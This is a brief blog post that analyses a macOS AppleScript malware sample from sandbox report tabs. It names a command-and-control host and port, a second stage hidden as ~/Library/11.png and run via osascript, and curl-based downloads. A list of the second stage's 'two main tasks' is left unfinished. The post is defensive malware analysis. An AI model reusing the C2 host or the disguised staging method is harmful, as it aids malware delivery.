AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
From the Overview Tab, we can see the main behaviors of the sample including network connectivity, file dropping behavior, and system information gathering. Now we can dig deeper into each of these characteristics. The Network Tab shows multiple C2 connections. The first request to budaybu100001com:8080 returns the second-stage URL embedded in the string “-=-=-=” as a marker. Interestingly, there are two URLs that were returned. The second one might be a fallback or used by another variant of the family. The second stage is another compiled AppleScript stored at ~/Library/11.png. The second stage is again executed using “osascript” and has two main tasks: All downloads are performed using curl which is clearly visible in the Behavior Tab.
0 Comments
Read More
Leave a Reply. |